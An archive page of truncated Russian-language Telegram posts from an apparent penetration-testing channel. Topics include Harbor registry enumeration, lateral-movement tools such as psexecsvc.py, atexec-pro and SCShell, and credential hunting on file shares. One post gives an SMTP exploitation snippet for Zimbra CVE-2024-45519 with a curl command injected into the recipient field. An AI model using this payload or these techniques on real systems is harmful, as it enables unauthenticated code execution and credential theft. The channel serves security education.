4 Mar 2025, 10:37 UTC≈2,120 views23 reactionsread 8 August 2026 Photo
Не так давно мы затрагивали тему использования Harbor для взаимодействия с Docker registry, но не затронули тему получения информации о контейнерах из самого Harbor, если у нас нет учетной записи.
В Harbor есть режим публичного (public) доступа к образам контейнеров, но стандартный GET-запрос к /v2/_catalog вернет HTTP 401.
Думаю, не стоит объяснять, что наличие выставленного public-доступа никак не влияет на важност…
🔥9👍6🌚4🏆4
Signed Дмитрий Курамин
18 Feb 2025, 10:37 UTC≈5,270 views22 reactionsread 8 August 2026 На прошлой неделе пошумел выход нового скрипта psexecsvc.py, на волне слоупоков давайте разбираться что там интересного.
Как ранее уже писал, psexec.py использует под капотом библиотеку RemCom и поднимает ряд пайпов (RemCom*) на целевой машине. С ним беда в том, что сам бинарь детектируется всеми, кому не лень и и использует пайпы (их всего 4), которые сами по себе детектируются тем же Sysmon с конфигом от SwiftOnSe…
🔥10👍7🏆5
Signed Vladimir
5 Feb 2025, 10:37 UTC≈1,730 views9 reactionsread 8 August 2026 Photo
Photo, posted without a caption
🔥7🌚1👍1
Signed Дмитрий Курамин
5 Feb 2025, 10:37 UTC≈1,520 views11 reactionsread 8 August 2026 Форк с ускоренной доставкой🚀
Как утащить сотни образов Docker контейнеров за несколько кликов и считанные минуты
Если вы начнете искать информацию о том, как стянуть образы контейнеров с публичного Docker registry, то, почти наверняка, столкнетесь c DockerRegistryGrabber.
Сегодня мы отправим этот проект на свалку истории и научимся пуллить в промышленных масштабах🏭🏭🏭
Для начала вспомним, по каким признакам можно опре…
🔥7👍2🌚1👎1
Signed Дмитрий Курамин
31 Jan 2025, 10:37 UTC≈1,190 views24 reactionsread 8 August 2026 Photo
Часто ли вы используете VS Code?
Представим, что на пентесте вы получаете учетку или доступ по SSH. Есть WinSCP и похожие утилиты, которые позволяют с легкостью серфить по файловой системе хоста. Но что, если я скажу вам, что необязательно устанавливать доп. утилиты и достаточно одной IDE?) Для этого можно использовать расширение для VS Code "Remote - SSH: Editing Configuration Files". Оно подключается по SSH и позво…
🔥13🌚6👍4🦄1
30 Jan 2025, 10:37 UTC≈1,120 views11 reactionsread 8 August 2026 Photo
Если вы когда-либо взаимодействовали с вебчиками и находили там swagger, вероятно, вы могли использовать swagger-ui, для проверки возможности отправки запросов.
Бывает, что для какого-то API может не быть собственной библиотеки, либо нет библиотеки на том языке программирования, которым вы владеете. Так вот ровно для таких целей есть вариант ленивого программиста. Можно скормить в swagger editor спецификацию API и:
1…
🔥9🌚1👍1
23 Jan 2025, 10:37 UTC≈1,210 views12 reactionsread 8 August 2026 Honeypot, упрощенно, это ресурс в инфре, который намеренно создаётся для привлечения внимания хакера в сети. Как именно он реализован - это уже вопрос фантазии. Главное чтобы с задачей справлялся.
Несколько примеров:
- Уязвимое сетевое устройство, попадая на которое хакер потратит много времени
- Учетная запись в AD с простым паролем, вход под которой (или обращение к ней) позволяет вредоносную активность
- Файл на …
🔥8👍3🌚1
13 Dec 2024, 10:37 UTC≈8,330 views24 reactionsread 8 August 2026 В этом посте кратко познакомимся с инструментом atexec-pro (https://github.com/Ridter/atexec-pro). Позволяет выполнять команды (в том числе powershell), загружать-скачивать файлы и выполнять .NET в памяти. Для последних трех ограничение в размере - 1 МБ.
Atexec-pro под капотом использует сервис TSCH против привычного ATSVC и работает через TCP (т.е. пайпы не используем). На мой взгляд примечательно то, что в своей р…
🔥14👍8🌚2
5 Nov 2024, 10:37 UTC≈2,080 views19 reactionsread 8 August 2026 #psexec #nxc
PsExec с низкопривилигированной УЗ
PsExec загружает на удаленный хост исполняемый файл 10-ти летней давности и создает службу, которая его запускает от имени системы - для этого и необходимы права администратора.
Сам файл в свою очередь это бинарь из https://github.com/kavika13/RemCom/, хранимый в виде хекса в Импакете.
При запуске он поднимает пайп RemCom_Communication и после подключения со стороны Им…
🔥13👍4🌚2
23 Oct 2024, 10:37 UTC≈1,930 views15 reactionsread 8 August 2026 #rpc #shell #rpcfilter
Сегодня познакомимся с инструментом для выполнения кода с использованием уже имеющихся сервисов в системе - SCShell (https://github.com/Mr-Un1k0d3r/SCShell/). В репе есть пример реализации на C# и Python.
Принцип работы прост, но отличается от PSExec и SMBExec. При запуска указывается имя сервиса (по умолчанию XblAuthManager), далее через svcctl (интерфейс служб) заменяет его бинарь (binary p…
🔥9👍4🦄2
29 Sept 2024, 10:37 UTC≈1,300 views13 reactionsread 8 August 2026 #zimbra #rce
Вышла новая CVE-2024-45519 на Zimbra Collaboration Suite < 9.0.0, а именно на сервис postjournal. Уязвимость позволяет выполнить удаленный код без аутентификации
В дополнение к другим постам хочу отметить, что по умолчанию Zimbra не будет уязвима, необходим включенный модуль postjournal.
Пример эксплуатации:
EHLO localhost
MAIL FROM: <[email protected]>
RCPT TO: <"aabbb$(curl${IFS}oast.me)"@mail.dom…
🔥7👍4🌚1👎1
29 May 2024, 10:37 UTC≈4,050 views11 reactionsread 8 August 2026 #recon #shares #post
Иногда что-нибудь ценное можно найти на шарах (файлы с кредами, персональные данные, какие-то пруфы реализации целей пентеста), для этих целей можно использовать скрапперы:
PowerView:
Find-InterestingDomainShareFile -Include *.doc*, *.xls*, *.csv, *.ppt*
Либо Snaffler (C#) (https://github.com/SnaffCon/Snaffler)
Python: https://github.com/blacklanternsecurity/MANSPIDER
Оба умеют искать и по назв…
🔥8👍2🦄1
Showing the 12 most recent of 16 posts we hold for @beaverdreamer. View and reaction counts are the latest single reading for each post, not a live figure, and a recent post is still accumulating both. A view count marked ≈ was rounded by Telegram before we ever saw it — t.me prints views in full below 1,000 and to three significant figures above, so ≈1,200,000 means somewhere between 1,150,000 and 1,249,999. Unmarked counts are exact. Text is reproduced from the public post preview and truncated for length.